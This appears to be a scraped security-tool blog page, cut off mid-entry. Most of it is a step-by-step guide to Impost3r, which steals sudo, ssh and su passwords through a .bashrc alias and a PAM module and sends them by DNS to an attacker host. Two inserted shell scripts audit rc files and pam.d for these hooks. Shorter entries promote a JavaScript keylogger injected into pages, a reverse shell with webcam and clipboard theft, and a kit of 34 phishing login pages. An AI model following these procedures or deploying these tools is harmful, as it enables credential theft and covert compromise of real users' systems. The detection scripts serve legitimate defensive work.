Impost3r can steal passwords for the sudo, su and ssh services. These fall into two categories, sudo on one side and ssh/su on the other, which are covered separately below.<br />
<h2>
Steal sudo password</h2>
Only requires an ordinary user's privileges, and can only steal the current user's password.<br />
<ul>
<li>
First, assume the attacker controls a server with ordinary (non-root) user privileges.<br />
</li>
<li>
Copy the original .bashrc file, <code>cp ~/.bashrc /tmp/</code>, and put the copy anywhere you like (this example uses /tmp/).<br />
</li>
<li>
Edit the original .bashrc and add the following at the end of the file (the path "/tmp/.impost3r" must match the FILENAME you set in the source below):<br />
</li>
</ul>
<pre><code>alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'
</code></pre>
<ul>
<li>
Save it and run <code>source ~/.bashrc</code><br />
</li>
<li>
Next, edit the Impost3r source file <code>/sudo/main.c</code>:<br />
</li>
</ul>
<pre><code>/*
Custom setting
*/
#define FILENAME "/tmp/.impost3r"      // Location of the Impost3r binary on the target server (must match the path used in the .bashrc alias).
#define BACKUP_BASHRC "/tmp/.bashrc"   // Location of the backup .bashrc on the target server.
#define SAVE_OR_SEND 0                 // What to do with a captured password: 0 = send to your server (default), 1 = save on the target server.
/*
Send to server
*/
#define MAX_RESEND 30                  // Maximum number of times Impost3r retries sending the result to the attacker's server.
#define RESEND_INTERVAL 5              // Interval between resend attempts.
#define REMOTE_ADDRESS "192.168.0.12"  // IP address of the attacker's server that receives the result.
#define REMOTE_PORT 53                 // Port on the attacker's server.
/*
Save to local
*/
#define SAVE_LOCATION "/tmp/.cache"    // Result file location when saving on the target server.
</code></pre>
<ul>
<li>
Save the source and run <code>make</code>.<br />
</li>
<li>
Collect the compiled <code>.impost3r</code> binary.<br />
</li>
<li>
Upload <code>.impost3r</code> to the target server at the path you set as FILENAME.<br />
</li>
<li>
Finally, run a DNS server on your own host (REMOTE_ADDRESS) listening on REMOTE_PORT, and wait for the results.<br />
</li>
</ul>
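The whole sudo trap lives in one appended alias, which is also what makes it cheap to hunt for. The audit below is an added example written for this page, not code from Impost3r or its author. It reads an rc file without sourcing it (sourcing a suspect file would execute whatever it carries), reports alias or function definitions that shadow sudo, su or ssh, and lists hidden executables the file points at, such as the /tmp/.impost3r path above. The constructed rc file and stand-in binary it builds for its self-check, and the suggestion to run it over ~/.bashrc, ~/.bash_profile, ~/.zshrc and /etc/bash.bashrc, are assumptions.<br />

```shell
#!/bin/sh
# Added example, not part of Impost3r or the original post. The sudo stealer
# above hooks "sudo" by appending an alias to ~/.bashrc that routes the call
# through a hidden binary. This audit reads an rc file without sourcing it
# (sourcing a suspect file would execute whatever it carries), reports alias
# or function definitions that shadow sudo, su or ssh, and lists hidden
# executables the file references. Assumption: you run it over ~/.bashrc,
# ~/.bash_profile, ~/.zshrc and /etc/bash.bashrc; here it runs over a
# constructed file.

# Print, with line numbers, every alias or function definition in RCFILE whose
# name is sudo, su or ssh. Exit status is grep's: 0 if any match, 1 if none.
find_shadowed_commands() {
    grep -nE '^[[:space:]]*(alias[[:space:]]+(sudo|su|ssh)=|(function[[:space:]]+)?(sudo|su|ssh)[[:space:]]*\(\))' "$1"
}

# Print every absolute path mentioned in RCFILE whose last component is a
# dotfile and that exists as an executable on this host (e.g. /tmp/.impost3r).
find_hidden_executables() {
    grep -oE '/[^"'"'"' ]*/\.[A-Za-z0-9._-]+' "$1" | sort -u | while read -r p; do
        if [ -f "$p" ] && [ -x "$p" ]; then printf '%s\n' "$p"; fi
    done
}

# Write a constructed rc file under DIR carrying the alias from the post,
# pointed at a harmless stand-in for the stealer binary.
make_demo_rc() {
    printf '#!/bin/sh\n' > "$1/.impost3r"   # stand-in, not the real tool
    chmod +x "$1/.impost3r"
    cat > "$1/bashrc" <<EOF
export PATH=\$HOME/bin:\$PATH
alias ll='ls -l'
alias sudo='impost3r() {
if [ -f "$1/.impost3r" ]; then
$1/.impost3r "\$@" && unalias sudo
else
unalias sudo;sudo "\$@"
fi
}; impost3r'
EOF
}

# Self-check against the constructed file.
demo=$(mktemp -d)
make_demo_rc "$demo"
if find_shadowed_commands "$demo/bashrc"; then
    echo "privileged command is shadowed; hidden executables referenced:"
    find_hidden_executables "$demo/bashrc"
fi
rm -rf "$demo"
```

The alias pattern is deliberately narrow (a definition at the start of a line) so that ordinary rc files produce no noise; a hit is worth reading in full, because the backup path in BACKUP_BASHRC above tells you where the attacker kept the clean copy.<br />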
<h3>
Demo</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uh5ZwggxxxM/Xt3HtDkAEyI/AAAAAAAASsg/wybAshFhHfgkqmHkHykyyATDhOmM2wDxgCNcBGAsYHQ/s1600/Impost3r_6.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="954" data-original-width="1600" height="380" src="https://1.bp.blogspot.com/-uh5ZwggxxxM/Xt3HtDkAEyI/AAAAAAAASsg/wybAshFhHfgkqmHkHykyyATDhOmM2wDxgCNcBGAsYHQ/s640/Impost3r_6.gif" width="640" /></a></div>
<br />
<h3>
Tips</h3>
<ul>
<li>When Impost3r captures the sudo password successfully, it automatically cleans the traces it left on the target server.</li>
</ul>
<h2>
Steal ssh/su password</h2>
Stealing the ssh/su password works differently from the sudo method above: it requires root privileges, and it can capture every user's password.<br />
The following uses Ubuntu as an example; CentOS is similar, but the file locations mentioned may differ slightly.<br />
<ul>
<li>
First, assume the attacker controls a server and has root privileges.<br />
</li>
<li>
Edit the Impost3r source file <code>/ssh_su/main.c</code>:<br />
</li>
</ul>
<pre><code>/*
Custom setting
*/
#define SSH_OR_BOTH 0                    // Stealing mode: 0 = ssh passwords only, 1 = ssh and su passwords (default 0; the difference is explained below).
#define SAVE_OR_SEND 0                   // What to do with a captured password: 0 = send to your server (default), 1 = save on the target server.
/*
Send to server
*/
#define MAX_RESEND 30                    // Maximum number of resend attempts to the attacker's server (only used when SSH_OR_BOTH is 0).
#define RESEND_INTERVAL 5                // Interval between resend attempts (only used when SSH_OR_BOTH is 0).
#define REMOTE_ADDRESS "192.168.0.12"    // IP address of the attacker's server that receives the result.
#define REMOTE_PORT 53                   // Port on the attacker's server.
/*
Save to local
*/
#define SAVE_LOCATION "/tmp/.sshsucache" // Result file location when saving on the target server.
</code></pre>
<ul>
<li>
After editing, save and run <code>make</code> in the current directory.<br />
</li>
<li>
Collect the compiled <code>impost3r.so</code>.<br />
</li>
<li>
Upload <code>impost3r.so</code> to the target server's PAM module directory, <code>/lib/x86_64-linux-gnu/security</code> on Ubuntu (the folder name differs between distributions).<br />
</li>
<li>
Go to <code>/etc/pam.d</code>; there are two cases. If you chose to steal only the ssh password, run <code>vi sshd</code> and append the following lines to the end of the file:<br />
</li>
</ul>
<pre><code>auth optional impost3r.so
account optional impost3r.so
</code></pre>
<ul>
<li>
Save and exit, then restart the sshd service: <code>service sshd restart</code><br />
</li>
<li>
If you chose to steal both the ssh and su passwords, edit <code>common-auth</code> instead, append the same lines, save and exit, and restart the sshd service.<br />
</li>
<li>
Start the DNS server on the attacker's host and wait for a legitimate user to log on to the target via <code>ssh</code> or switch users with <code>su</code>; their password is captured.<br />
</li>
</ul>
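The two appended lines are the detection opportunity on the PAM side: a module that is not part of any package, registered with the <code>optional</code> control so it can never make a login fail. The audit below is an added example written for this page, not code from Impost3r or its author. It walks a pam.d directory, parses each rule (skipping comments and include directives and handling bracketed controls such as <code>[success=1 default=ignore]</code>), and reports every module reference that is missing from a baseline allowlist. The baseline file format, the constructed pam.d tree it builds for its self-check, and the suggestion of building a real baseline from <code>dpkg -L libpam-modules libpam-runtime</code> on Debian/Ubuntu are assumptions.<br />

```shell
#!/bin/sh
# Added example, not part of Impost3r or the original post. Audits a pam.d
# directory for module references that are not on a baseline allowlist. The
# stealer above is wired in as "auth optional impost3r.so": with "optional"
# it can never cause a login to fail, so it is easy to overlook in a casual
# read of /etc/pam.d. The baseline is a file with one module file name per
# line; assumption: on Debian/Ubuntu it can be generated from package contents
# (dpkg -L libpam-modules libpam-runtime | grep '\.so$' | xargs -n1 basename),
# adjusted for your distribution.

# Print "file:line:control:module" for every module reference under PAMDIR
# whose module is not listed in BASELINE. Comments, blank lines and
# @include/include/substack directives are skipped; bracketed controls such
# as [success=1 default=ignore] are handled. Returns 0 if anything unlisted
# was found, 1 otherwise.
pam_unlisted_modules() {
    pamdir="$1"; baseline="$2"; found=1
    for cfg in "$pamdir"/*; do
        [ -f "$cfg" ] || continue
        n=0
        while IFS= read -r line || [ -n "$line" ]; do
            n=$((n + 1))
            case "$line" in
                ''|'#'*|'@include'*) continue ;;
            esac
            set -f; set -- $line; set +f    # fields: type control module [args]
            [ $# -ge 3 ] || continue
            shift                           # drop the type (auth, account, ...)
            control=$1; shift
            case "$control" in
                '['*)                       # bracketed control may span words
                    while [ $# -gt 1 ]; do
                        case "$control" in *']') break ;; esac
                        control="$control $1"; shift
                    done ;;
                include|substack) continue ;;
            esac
            module=${1##*/}                 # strip any directory prefix
            if ! grep -qxF "$module" "$baseline"; then
                printf '%s:%s:%s:%s\n' "$cfg" "$n" "$control" "$module"
                found=0
            fi
        done < "$cfg"
    done
    return "$found"
}

# Build a constructed pam.d tree and baseline under DIR for the self-check.
# The sshd file ends with the two lines the post tells the attacker to append.
make_demo_pam() {
    mkdir -p "$1/pam.d"
    printf '%s\n' pam_unix.so pam_deny.so pam_permit.so pam_nologin.so pam_motd.so > "$1/baseline.txt"
    cat > "$1/pam.d/common-auth" <<'EOF'
# constructed: typical Debian common-auth
auth    [success=1 default=ignore]      pam_unix.so nullok_secure
auth    requisite                       pam_deny.so
auth    required                        pam_permit.so
EOF
    cat > "$1/pam.d/sshd" <<'EOF'
# constructed: sshd stack with the two appended stealer lines
@include common-auth
account    required     pam_nologin.so
session    optional     pam_motd.so motd=/run/motd.dynamic
auth optional impost3r.so
account optional impost3r.so
EOF
}

# Self-check against the constructed tree.
demo=$(mktemp -d)
make_demo_pam "$demo"
if pam_unlisted_modules "$demo/pam.d" "$demo/baseline.txt"; then
    echo "unlisted PAM modules above: verify each .so against your package manager"
fi
rm -rf "$demo"
```

On a real host, pair the report with a package-ownership check on the module directory itself (for example <code>dpkg -S</code> on every .so under /lib/x86_64-linux-gnu/security), since dropping the file there is the first step of the procedure above and a stale baseline would otherwise let a renamed module through.<br />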
<h3>
Demo</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uWFLAwptYq0/Xt3H3MDPYfI/AAAAAAAASso/bKjg79mlgVowASowvYRg5l9oblt3pqDCQCNcBGAsYHQ/s1600/Impost3r_7.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="819" data-original-width="1374" height="380" src="https://1.bp.blogspot.com/-uWFLAwptYq0/Xt3H3MDPYfI/AAAAAAAASso/bKjg79mlgVowASowvYRg5l9oblt3pqDCQCNcBGAsYHQ/s640/Impost3r_7.gif" width="640" /></a></div>
<br />
<h3>
Tips</h3>
<ul>
<li>
In the case of stealing the ssh/su password, Impost3r cannot clear
the traces due to permission reasons, so the attacker needs to clear
them himself<br />
</li>
<li>
Please note that if you configure it to steal only ssh passwords, you will receive the stolen results nearly 100 percent of the time, but if you configure it to steal both, receiving the results is not guaranteed 100 percent. (Saving the result locally does not have this problem; only DNS delivery does.)<br />
</li>
<li>
Stealing the su password is not recommended, since the user's ssh password is the same as the su password; having the ssh password is enough, I think.<br />
</li>
</ul>
<h2>
Attention</h2>
<ul>
<li>The DNS server program I use is <a href="https://github.com/deepdarkness/Fdns">Fdns</a>, with some parameters changed; you can find the modified source code under the <code>Fdns</code> folder and compile it yourself with <code>gcc -o dns main.c util.c</code>. You can actually use any kind of DNS server, but the DNS server you use must send a DNS response back to the client rather than only recording the DNS request (you still need to record the request, or you will lose the stolen result).</li>
<li>This project was coded just for fun; the logic and code structure are not very strict, so please don't be too serious about it. Suggestions and PRs are welcome.</li>
</ul>
<h2>
Thanks</h2>
<ul>
<li><a href="https://github.com/deepdarkness/Fdns">Fdns</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ph4ntonn/Impost3r" rel="nofollow" target="_blank" title="Download Impost3r">Download Impost3r</a></span></b></div>
<h2>Flux-Keylogger - Modern Javascript Keylogger With Web Panel (2020-04-19)</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-b2K6QvrWNgo/Xpy_G-iAjdI/AAAAAAAASRI/9NqroEcxz3sItxjtuj-1iLhaX3G0xPX8QCNcBGAsYHQ/s1600/Flux-Keylogger_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="306" data-original-width="818" height="238" src="https://1.bp.blogspot.com/-b2K6QvrWNgo/Xpy_G-iAjdI/AAAAAAAASRI/9NqroEcxz3sItxjtuj-1iLhaX3G0xPX8QCNcBGAsYHQ/s640/Flux-Keylogger_1_logo.png" width="640" /></a></div>
<br />
<blockquote>
Modern javascript <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank" title="keylogger">keylogger</a> with web panel</blockquote>
<br />
<span style="font-size: large;"><b>Web panel:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-JW3P9JLfhEg/Xpy_ML70wYI/AAAAAAAASRM/sF-61I4s2rweupnmWiU-vXqOy2_xvpL7ACNcBGAsYHQ/s1600/Flux-Keylogger_2_panel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://1.bp.blogspot.com/-JW3P9JLfhEg/Xpy_ML70wYI/AAAAAAAASRM/sF-61I4s2rweupnmWiU-vXqOy2_xvpL7ACNcBGAsYHQ/s640/Flux-Keylogger_2_panel.png" width="640" /></a></div>
<b style="font-size: x-large;">Logging:</b><br />
<ul>
<li>Keylogger</li>
<li>Cookies</li>
<li>Location</li>
<li>Remote IP</li>
<li>User-Agents</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation server files:</b></span><br />
<ul>
<li>Upload the files from the <code>server</code> directory to your server</li>
<li>Change default username, password in flux.php</li>
<li>Go to <a href="http://you.host/flux.php" rel="nofollow" target="_blank" title="http://you.host/flux.php">http://you.host/flux.php</a></li>
<li>Click build</li>
<li>Now inject the script tag into other documents</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/LimerBoy/Flux-Keylogger" rel="nofollow" target="_blank" title="Download Flux-Keylogger">Download Flux-Keylogger</a></span></b></div>
<h2>TinkererShell - A Simple Python Reverse Shell Written Just For Fun (2019-09-14)</h2>
A simple reverse shell written in Python 3.7 just for fun. It currently supports <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Linux and integrates some basic features like keylogging and AES-encrypted communications.<br />
<br />
<span style="font-size: large;"><b>Supported operating systems:</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item">Windows</li>
<li class="task-list-item">Linux</li>
<li class="task-list-item">OSX</li>
</ul>
<span style="font-size: large;"><b>Functions and characteristics:</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item"><a href="https://www.kitploit.com/search/label/Reverse" target="_blank" title="Reverse">Reverse</a> connection.</li>
<li class="task-list-item">AES encrypted communications.</li>
<li class="task-list-item">Multithreaded.</li>
<li class="task-list-item">Support multiple bots connected at the same time.</li>
<li class="task-list-item">Keylogger.</li>
<li class="task-list-item">Possibility to take screenshots of bot's monitors.</li>
<li class="task-list-item">Possibility to take pictures using bot's webcam.</li>
<li class="task-list-item">Possibility to steal the bot's clipboard content.</li>
<li class="task-list-item">Possibility to enable or disable persistence (before <a href="https://www.kitploit.com/search/label/Payload" target="_blank" title="payload">payload</a> delivery or later via remote control).</li>
<li class="task-list-item">Possibility to enable or disable <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank" title="keylogger">keylogger</a> (before payload delivery or later via remote control).</li>
<li class="task-list-item">Simple DNS <a href="https://www.kitploit.com/search/label/Spoofer" target="_blank" title="spoofer">spoofer</a> (via hosts file).</li>
<li class="task-list-item">Capability to upload and download files to and from the bot.</li>
</ul>
<blockquote>
Work in progress... stay tuned!</blockquote>
<br />
<b>TODO:</b><br />
<ul>
<li>Thoroughly test persistence function on Linux.</li>
<li>Thoroughly test persistence function on Windows.</li>
<li>Add webcam stream and microphone recording (ideally streaming from bot and saving locally to master).</li>
</ul>
<strong><em>This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software.</em></strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/4n4nk3/TinkererShell" rel="nofollow" target="_blank" title="Download TinkererShell">Download TinkererShell</a></span></b></div>
<h2>HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available) (2019-07-22)</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jNjrHagkyaw/XTHyJ_ZUSJI/AAAAAAAAPoA/uE5Si2T7_SA6eU-gieIf6PSZrN4dl7r9gCLcBGAs/s1600/HiddenEye_2_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="1312" height="246" src="https://1.bp.blogspot.com/-jNjrHagkyaw/XTHyJ_ZUSJI/AAAAAAAAPoA/uE5Si2T7_SA6eU-gieIf6PSZrN4dl7r9gCLcBGAs/s640/HiddenEye_2_logo.png" width="640" /></a></div>
<div align="center">
Modern Phishing Tool With Advanced Functionality </div>
<div align="center">
PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING</div>
<span style="font-size: x-large;"><b>DEVELOPERS & CONTRIBUTORS</b></span><br />
<ol>
<li>ANONUD4Y (<a href="https://github.com/An0nUD4Y" rel="nofollow" target="_blank" title="https://github.com/An0nUD4Y">https://github.com/An0nUD4Y</a>)</li>
<li>USAMA ABDUL SATTAR (<a href="https://github.com/usama7628674" rel="nofollow" target="_blank" title="https://github.com/usama7628674">https://github.com/usama7628674</a>)</li>
<li>sTiKyt (<a href="https://github.com/sTiKyt" rel="nofollow" target="_blank" title="https://github.com/sTiKyt">https://github.com/sTiKyt</a>)</li>
<li>UNDEADSEC (<a href="https://github.com/UndeadSec" rel="nofollow" target="_blank" title="https://github.com/UndeadSec">https://github.com/UndeadSec</a>)</li>
<li>Micrafast (<a href="https://github.com/Micrafast" rel="nofollow" target="_blank" title="https://github.com/Micrafast">https://github.com/Micrafast</a>)</li>
<li>___________ (WAITING FOR YOU)</li>
</ol>
<br />
<span style="font-size: x-large;"><b>SCREENSHOT (Android-Userland)</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sODkn89pRQw/XTHyU4g2kVI/AAAAAAAAPoE/3T-Jp-rJGzUXEUaftMwxkVnmZ-jRqHcAwCLcBGAs/s1600/HiddenEye_5_Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1440" height="320" src="https://1.bp.blogspot.com/-sODkn89pRQw/XTHyU4g2kVI/AAAAAAAAPoE/3T-Jp-rJGzUXEUaftMwxkVnmZ-jRqHcAwCLcBGAs/s640/HiddenEye_5_Screenshot.png" width="640" /></a></div>
<span style="font-size: large;"><b>CREDIT:-</b></span><br />
<ul>
<li>Anonud4y ( I don't remember if i have done Anything )</li>
<li>Usama ( A Most active Developer)</li>
<li>sTiKyt ( Guy Who recustomized everything )</li>
<li>UNDEADSEC (For His wonderful repo socialfish which motivated us a lot)</li>
<li>TheLinuxChoice ( For His Tools Phishing Pages )</li>
</ul>
<br />
<b>TESTED ON FOLLOWING:-</b><br />
<ul>
<li><strong>Kali Linux - Rolling Edition</strong></li>
<li><strong>Parrot OS - Rolling Edition</strong></li>
<li><strong>Linux Mint - 18.3 Sylvia</strong></li>
<li><strong>Ubuntu - 16.04.3 LTS</strong></li>
<li><strong>MacOS High Sierra</strong></li>
<li><strong>Arch Linux</strong></li>
<li><strong>Manjaro XFCE Edition 17.1.12</strong></li>
<li><strong>Black Arch</strong></li>
<li><strong>Userland app (For Android Users)</strong></li>
</ul>
<br />
<b>PREREQUISITES ( Please verify if you have installed )</b><br />
<ul>
<li>Python 3</li>
<li>Wget from Python</li>
<li>PHP</li>
<li>sudo</li>
</ul>
<br />
<span style="font-size: x-large;"><b>FOUND A BUG ? / HAVE ANY ISSUE ? :- (Read This)</b></span><br />
<ul>
<li>Check closed and solved issues/bugs before opening a new one.</li>
<li>Make sure your issue is related to the code and resources of this repository.</li>
<li>It is your responsibility to respond on the issues you open.</li>
<li>If we do not find a response from the reporter within a reasonable time interval, we will close that issue.</li>
<li>Do not spam or advertise, and respect everyone.</li>
</ul>
<br />
<b>WHAT'S NEW FEATURES</b><br />
<strong>1) LIVE ATTACK</strong><br />
<ul>
<li>Now you will have live information about the victims, such as IP address, geolocation, ISP, country and more.</li>
</ul>
<strong>2) COMPATIBILITY</strong><br />
<ul>
<li>All the sites are mobile compatible.</li>
</ul>
<strong>3) KEYLOGGER</strong><br />
<ul>
<li>Now you will also have the ability to capture all the keystrokes of the victim.</li>
<li>You can now deploy keyloggers with a (Y/N) option.</li>
<li>Major issues fixed.</li>
</ul>
<strong>4) ANDROID SUPPORT</strong><br />
<ul>
<li>We care about Android users, so we have come up with two ways to run HiddenEye on Android devices.</li>
</ul>
<strong>(A) UserLand App</strong><br />
<ul>
<li>You have to download the UserLand app. <a href="https://play.google.com/store/apps/details?id=tech.ula" rel="nofollow" target="_blank" title="Click Here">Click Here</a> to download it.</li>
<li>To read more about how to set up the UserLand app, read <a href="https://null-byte.wonderhowto.com/how-to/android-for-hackers-turn-android-phone-into-hacking-device-without-root-0189649/" rel="nofollow" target="_blank" title="HERE">HERE</a></li>
</ul>
<strong>(B) Termux App</strong><br />
<ul>
<li>You Have to Download Termux App. <a href="https://play.google.com/store/apps/details?id=com.termux" rel="nofollow" target="_blank" title="Click Here">Click Here</a> To Download it.</li>
<li>For Further instruction <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/instructions.md" rel="nofollow" target="_blank" title="Check Instructions">Check Instructions</a></li>
<li>Termux users should clone with this command; otherwise errors may occur at runtime.</li>
</ul>
<pre><code>git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
</code></pre>
<strong>5) NEW LOOK PROVIDED</strong><br />
<ul>
<li>NOW FOCUS EASILY ON TASKS...</li>
<li>CUSTOMIZE APP WITH YOUR OWN THEMES</li>
</ul>
<strong>6) SERVEO URL TYPE SELECTION AVAILABLE NOW</strong><br />
<ul>
<li>Major issues with serveo are fixed.</li>
<li>Now You can choose out of CUSTOM URL and RANDOM URL.</li>
</ul>
<strong>7) LARGE COLLECTION OF PHISHING PAGES ADDED</strong><br />
<ul>
<li>Pages are taken from various tools, including ShellPhish, Blackeye and <a href="https://www.kitploit.com/search/label/SocialFish" target="_blank" title="SocialFish">SocialFish</a>.</li>
</ul>
<br />
<span style="font-size: large;"><b>FOR FURTHER INSTALLATION PROCEDURE - <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/instructions.md" rel="nofollow" target="_blank" title="(CHECK INSTRUCTIONS)">(CHECK INSTRUCTIONS)</a></b></span><br />
<br />
<span style="font-size: large;"><b>AVAILABLE PAGES</b></span><br />
<strong>1) Facebook:</strong><br />
<ul>
<li>Traditional Facebook login page.</li>
<li>Advanced Poll Method.</li>
<li>Fake Security login with Facebook Page.</li>
<li>Facebook messenger login page.</li>
</ul>
<strong>2) Google:</strong><br />
<ul>
<li>Traditional Google login page.</li>
<li>Advanced Poll Method.</li>
<li>New Google Page.</li>
</ul>
<strong>3) LinkedIn:</strong><br />
<ul>
<li>Traditional LinkedIn login page.</li>
</ul>
<strong>4) Github:</strong><br />
<ul>
<li>Traditional Github login page.</li>
</ul>
<strong>5) Stackoverflow:</strong><br />
<ul>
<li>Traditional Stackoverflow login page.</li>
</ul>
<strong>6) Wordpress:</strong><br />
<ul>
<li>Similar Wordpress login page.</li>
</ul>
<strong>7) Twitter:</strong><br />
<ul>
<li>Traditional Twitter login page.</li>
</ul>
<strong>8) Instagram:</strong><br />
<ul>
<li>Traditional <a href="https://www.kitploit.com/search/label/Instagram" target="_blank" title="Instagram">Instagram</a> login page.</li>
<li>Instagram Autoliker Phishing Page.</li>
<li>Instagram Profile Scenario Advanced attack.</li>
<li>Instagram Badge Verify Attack <em>[New]</em></li>
<li>Instagram AutoFollower Phishing Page by (<a href="https://github.com/thelinuxchoice" rel="nofollow" target="_blank" title="https://github.com/thelinuxchoice">https://github.com/thelinuxchoice</a>)</li>
</ul>
<strong>9) SNAPCHAT PHISHING:</strong><br />
<ul>
<li>Traditional Snapchat Login Page</li>
</ul>
<strong>10) YAHOO PHISHING:</strong><br />
<ul>
<li>Traditional Yahoo Login Page</li>
</ul>
<strong>11) TWITCH PHISHING:</strong><br />
<ul>
<li>Traditional Twitch Login Page [ Login With Facebook Also Available ]</li>
</ul>
<strong>12) MICROSOFT PHISHING:</strong><br />
<ul>
<li>Traditional Microsoft-Live Web Login Page</li>
</ul>
<strong>13) STEAM PHISHING:</strong><br />
<ul>
<li>Traditional Steam Web Login Page</li>
</ul>
<strong>14) VK PHISHING:</strong><br />
<ul>
<li>Traditional VK Web Login Page</li>
<li>Advanced Poll Method</li>
</ul>
<strong>15) ICLOUD PHISHING:</strong><br />
<ul>
<li>Traditional iCloud Web Login Page</li>
</ul>
<strong>16) GitLab PHISHING:</strong><br />
<ul>
<li>Traditional GitLab Login Page</li>
</ul>
<strong>17) NetFlix PHISHING:</strong><br />
<ul>
<li>Traditional Netflix Login Page</li>
</ul>
<strong>18) Origin PHISHING:</strong><br />
<ul>
<li>Traditional Origin Login Page</li>
</ul>
<strong>19) Pinterest PHISHING:</strong><br />
<ul>
<li>Traditional Pinterest Login Page</li>
</ul>
<strong>20) Protonmail PHISHING:</strong><br />
<ul>
<li>Traditional Protonmail Login Page</li>
</ul>
<strong>21) Spotify PHISHING:</strong><br />
<ul>
<li>Traditional Spotify Login Page</li>
</ul>
<strong>22) Quora PHISHING:</strong><br />
<ul>
<li>Traditional Quora Login Page</li>
</ul>
<strong>23) PornHub PHISHING:</strong><br />
<ul>
<li>Traditional PornHub Login Page</li>
</ul>
<strong>24) Adobe PHISHING:</strong><br />
<ul>
<li>Traditional Adobe Login Page</li>
</ul>
<strong>25) Badoo PHISHING:</strong><br />
<ul>
<li>Traditional Badoo Login Page</li>
</ul>
<strong>26) CryptoCurrency PHISHING:</strong><br />
<ul>
<li>Traditional CryptoCurrency Login Page</li>
</ul>
<strong>27) DevianArt PHISHING:</strong><br />
<ul>
<li>Traditional DevianArt Login Page</li>
</ul>
<strong>28) DropBox PHISHING:</strong><br />
<ul>
<li>Traditional DropBox Login Page</li>
</ul>
<strong>29) eBay PHISHING:</strong><br />
<ul>
<li>Traditional eBay Login Page</li>
</ul>
<strong>30) MySpace PHISHING:</strong><br />
<ul>
<li>Traditional Myspace Login Page</li>
</ul>
<strong>31) PayPal PHISHING:</strong><br />
<ul>
<li>Traditional PayPal Login Page</li>
</ul>
<strong>32) Shopify PHISHING:</strong><br />
<ul>
<li>Traditional Shopify Login Page</li>
</ul>
<strong>33) Verizon PHISHING:</strong><br />
<ul>
<li>Traditional Verizon Login Page</li>
</ul>
<strong>34) Yandex PHISHING:</strong><br />
<ul>
<li>Traditional Yandex Login Page</li>
</ul>
<br />
<b>ASCII error fix</b><br />
<code>dpkg-reconfigure locales</code><br />
Then select "All locales", then select "en_US.UTF-8". After that, reboot your machine, open a terminal and run <code>locale</code>: you should see "en_US.UTF-8" as the default locale instead of POSIX.<br />
<br />
<span style="font-size: large;"><b>DISCLAIMER</b></span><br />
<div align="center">
TO BE USED FOR EDUCATIONAL PURPOSES ONLY </div>
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a>.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/DarkSecDevelopers/HiddenEye" rel="nofollow" target="_blank" title="Download HiddenEye">Download HiddenEye</a></span></b></div>
<h2>Slackor - A Golang Implant That Uses Slack As A Command And Control Server (2019-07-04)</h2>
A Golang implant that uses Slack as a command and control channel.<br />
This project was inspired by <a href="https://github.com/byt3bl33d3r/gcat" rel="nofollow" target="_blank" title="Gcat">Gcat</a> and <a href="https://github.com/PaulSec/twittor" rel="nofollow" target="_blank" title="Twittor">Twittor</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-taB1C6-xgUU/XRqRfzYjeRI/AAAAAAAAPfg/J_AP0-WmvbIMPYZLi6w403hVHld0ULnxwCLcBGAs/s1600/Slackor_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="642" data-original-width="602" height="640" src="https://1.bp.blogspot.com/-taB1C6-xgUU/XRqRfzYjeRI/AAAAAAAAPfg/J_AP0-WmvbIMPYZLi6w403hVHld0ULnxwCLcBGAs/s640/Slackor_1.png" width="600" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
